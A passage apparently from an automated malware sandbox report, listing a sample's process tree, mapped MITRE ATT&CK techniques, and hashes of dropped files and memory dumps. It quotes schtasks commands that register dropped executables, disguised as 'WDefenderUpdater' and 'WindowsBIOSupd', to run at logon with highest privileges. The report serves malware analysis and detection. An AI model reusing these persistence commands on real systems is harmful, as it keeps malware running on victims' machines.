  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4240
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "WindowsBIOSupd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\real.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2412
- - C:\Users\Admin\AppData\Roaming\Microsoft\WDefenderUpdater.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\WDefenderUpdater.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "WindowsBIOSupd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\WDefenderUpdater.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1028
- - C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    3⤵
    - Executes dropped EXE
    PID:224
- - C:\Windows\SysWOW64\SCHTASKS.exe
    "SCHTASKS.exe" /create /tn "$77real.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\real.exe'" /sc onlogon /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4364

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3924

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2636
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2636 -s 852
  2⤵
  PID:2204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3540

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3024

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4624

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4644

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4400

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:2748

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2816
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2816 -s 876
  2⤵
  PID:4024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2432

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2284
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2284 -s 332
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:5100
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5100 -s 408
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7204.tmp.csv

Filesize
32KB

MD5
17436f9598e396215bcd5447286f96ed

SHA1
aedcadfa4737c1f1a222ddf94b85264d72d47ae3

SHA256
fccfcdd12369b6b1e7c45d3946c9646b3a2ea6644b3cf42f7a3b2c7236836f07

SHA512
7fee08b2a69b981747aee449b3dda0d7461b233250bd886cf4bb8e9d7b8152e652f72a300c64a9ca68676dd2bf58cd7e99372dc519d1850937dc497a79037a7e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7263.tmp.txt

Filesize
12KB

MD5
f3e4d4be99f908d54f122c17ba5894fe

SHA1
59e25a5e622bbf661f992cd32842f9b4989432ec

SHA256
b27f7cac9d700a9394e4be652dfd3d8ddf49ec7af0101a8fe2737e235e93e9a1

SHA512
bbc6bc96aca3782af23163d9609eeca3e4cc07d1fc853740594b8c60719583ef5ce14a32f51e8227065507950a6c35a5d158e34f240b72268be31805cb418abf

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7811.tmp.csv

Filesize
32KB

MD5
6ddab5a905b71dae4123beec301b7301

SHA1
9c3f269bc9fb3cfa2f7ae9b246d292f593ea7d26

SHA256
3efe15ac813d0784d832b44f36ac7540922ccebe1e2b0082afa7436735584140

SHA512
3a4dc48a63cc2ab54977f0a89c4aef60ca76b5df390bbf96427f916d57bc7f280add212bda59c3adf29c377a51dd04bae53f0fb43c00bd8762671a23257d0f9a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER78DD.tmp.txt

Filesize
12KB

MD5
0b449bd82e0079106f4b23f702445dd9

SHA1
2a120e1eb977863bb32a403d6cd2f3d4aa00efb4

SHA256
41479a6fd4340899141821b63138e119aadbf91669842a469f261ee72b020724

SHA512
75cdc6f0ea864dc626aacd4d228fdb1dac9a3cd2aefb4a911a09f0c129bc17ad87b6123cad1b6a92c333ba3cc0bc35b757aacb990cf5cf1b4622eeb8107e7c1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\WDefenderUpdater.exe

Filesize
409KB

MD5
16be7896ffd96f3c15ca40ff3243674f

SHA1
321e82e120535d5f48430284804d5aca5f78d8c7

SHA256
e297f022413aee60290878fd253b68ecb9af7e7919ddae6093a977c10b47ca07

SHA512
6dda93f0e4e47caf40bf15372fd8edee36b8a66d4d6ee3a6e1400c9297cbaa32584c6f8c97e2e76c4e3cd8b195d8e9cbb898870559e7a7177db97eb8c0a521ad

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_pg102dpo.jut.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
338B

MD5
17ecf0e5b58b00fe1bf45ce0cef87d93

SHA1
0fa337612ab2169ef11bb4dc1a3d83a25552308f

SHA256
b6cc0a977c1dea43ef8b83e1d0f8b348b6b31ca3fe7f35abe36d6d1099b960db

SHA512
e8329f85cdac94f8bd58e850b8a41b4741c0fdf5a936e04c20e81a7e7dbf5ad00ee3e9a5fe17f77a1ee0fd9c797448338b4446ae15338235fc95bdb5cb9cb4dd

Download Submit
memory/364-122-0x00000147EF1D0000-0x00000147EF1FB000-memory.dmp

Filesize
172KB

Download
memory/580-112-0x00007FFE04F40000-0x00007FFE04F50000-memory.dmp

Filesize
64KB

Download
memory/580-113-0x00007FFE44F55000-0x00007FFE44F56000-memory.dmp

Filesize
4KB

Download
memory/580-71-0x000001FDF50C0000-0x000001FDF50E5000-memory.dmp

Filesize
148KB

Download
memory/580-77-0x000001FDF50F0000-0x000001FDF511B000-memory.dmp

Filesize
172KB

Download
memory/580-108-0x000001FDF50F0000-0x000001FDF511B000-memory.dmp

Filesize
172KB

Download
memory/580-72-0x000001FDF50F0000-0x000001FDF511B000-memory.dmp

Filesize
172KB

Download
memory/636-123-0x00000206E9AE0000-0x00000206E9B0B000-memory.dmp

Filesize
172KB

Download
memory/648-120-0x000001BEA1200000-0x000001BEA122B000-memory.dmp

Filesize
172KB

Download
memory/648-81-0x000001BEA1200000-0x000001BEA122B000-memory.dmp

Filesize
172KB

Download
memory/648-125-0x00007FFE04F40000-0x00007FFE04F50000-memory.dmp

Filesize
64KB

Download
memory/748-102-0x000001A897A70000-0x000001A897A9B000-memory.dmp

Filesize
172KB

Download
memory/836-84-0x0000000004BF0000-0x0000000004C00000-memory.dmp

Filesize
64KB

Download
memory/836-810-0x0000000077C92000-0x0000000077C93000-memory.dmp

Filesize
4KB

Download
memory/836-14-0x0000000004BF0000-0x0000000004C00000-memory.dmp

Filesize
64KB

Download
memory/836-775-0x0000000000190000-0x00000000001AC000-memory.dmp

Filesize
112KB

Download
memory/836-21-0x0000000005CF0000-0x0000000005CFA000-memory.dmp

Filesize
40KB

Download
memory/836-78-0x0000000073F00000-0x00000000745EE000-memory.dmp

Filesize
6.9MB

Download
memory/836-13-0x0000000073F00000-0x00000000745EE000-memory.dmp

Filesize
6.9MB

Download
memory/980-100-0x000001939A640000-0x000001939A66B000-memory.dmp

Filesize
172KB

Download
memory/980-160-0x00007FFE44F55000-0x00007FFE44F56000-memory.dmp

Filesize
4KB

Download
memory/1928-420-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/1928-350-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/2788-534-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/2788-542-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/3512-29-0x0000019E7ACF0000-0x0000019E7AD00000-memory.dmp

Filesize
64KB

Download
memory/3512-54-0x00007FFE44AE0000-0x00007FFE44B8E000-memory.dmp

Filesize
696KB

Download
memory/3512-74-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/3512-75-0x00007FFE44AE0000-0x00007FFE44B8E000-memory.dmp

Filesize
696KB

Download
memory/3512-27-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/3512-28-0x0000019E7ACF0000-0x0000019E7AD00000-memory.dmp

Filesize
64KB

Download
memory/3512-30-0x0000019E7AD00000-0x0000019E7AD22000-memory.dmp

Filesize
136KB

Download
memory/3512-33-0x0000019E7AEB0000-0x0000019E7AF26000-memory.dmp

Filesize
472KB

Download
memory/3512-73-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/3512-45-0x0000019E7ACF0000-0x0000019E7AD00000-memory.dmp

Filesize
64KB

Download
memory/3512-52-0x0000019E7AE70000-0x0000019E7AE9A000-memory.dmp

Filesize
168KB

Download
memory/3512-53-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/4040-96-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/4040-68-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4040-57-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4040-56-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4040-55-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4040-61-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4040-62-0x00007FFE44EB0000-0x00007FFE4508B000-memory.dmp

Filesize
1.9MB

Download
memory/4040-64-0x00007FFE44AE0000-0x00007FFE44B8E000-memory.dmp

Filesize
696KB

Download
memory/4040-59-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4240-0-0x00000000005B0000-0x000000000061C000-memory.dmp

Filesize
432KB

Download
memory/4240-22-0x0000000073F00000-0x00000000745EE000-memory.dmp

Filesize
6.9MB

Download
memory/4240-7-0x0000000005EE0000-0x0000000005F1E000-memory.dmp

Filesize
248KB

Download
memory/4240-6-0x0000000005AF0000-0x0000000005B02000-memory.dmp

Filesize
72KB

Download
memory/4240-5-0x0000000004F80000-0x0000000004FE6000-memory.dmp

Filesize
408KB

Download
memory/4240-4-0x0000000004F70000-0x0000000004F80000-memory.dmp

Filesize
64KB

Download
memory/4240-3-0x0000000004E90000-0x0000000004F22000-memory.dmp

Filesize
584KB

Download
memory/4240-2-0x00000000052F0000-0x00000000057EE000-memory.dmp

Filesize
5.0MB

Download
memory/4240-1-0x0000000073F00000-0x00000000745EE000-memory.dmp

Filesize
6.9MB

Download